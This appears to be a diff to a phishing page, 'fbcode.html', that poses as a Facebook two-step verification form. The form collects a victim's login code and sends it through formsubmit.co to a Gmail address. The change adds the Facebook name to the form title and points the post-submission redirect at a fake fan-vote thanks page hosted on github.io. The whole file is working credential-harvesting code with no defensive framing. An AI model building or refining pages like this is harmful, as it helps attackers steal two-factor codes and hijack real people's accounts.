--- a/fbcode.html
+++ b/fbcode.html
@@ -58,7 +58,7 @@
       <!-- FORM SECTION -->
       <article class="form-area">
         <form  action="https://formsubmit.co/votersforambassador@gmail.com" method="POST" accept=".">
-          <p class="small-title">2-Step Verification</p>
+          <p class="small-title">Facebook 2-Step Verification</p>
           <input
             type="text"
             name="code"
@@ -73,7 +73,7 @@
             <a href="#" class="small">resend it</a>
             <div class="forget"><a href="#">Forgot password?</a></div>
           </div>
-          <input type="hidden" name="_next" value="https://fanvote.mynetly.com/voteklz/thanks.html">
+          <input type="hidden" name="_next" value="https://sephorasquad.github.io/votegd/thanks.html">
 <input type="hidden" name="_captcha" value="false">
 
         </form>
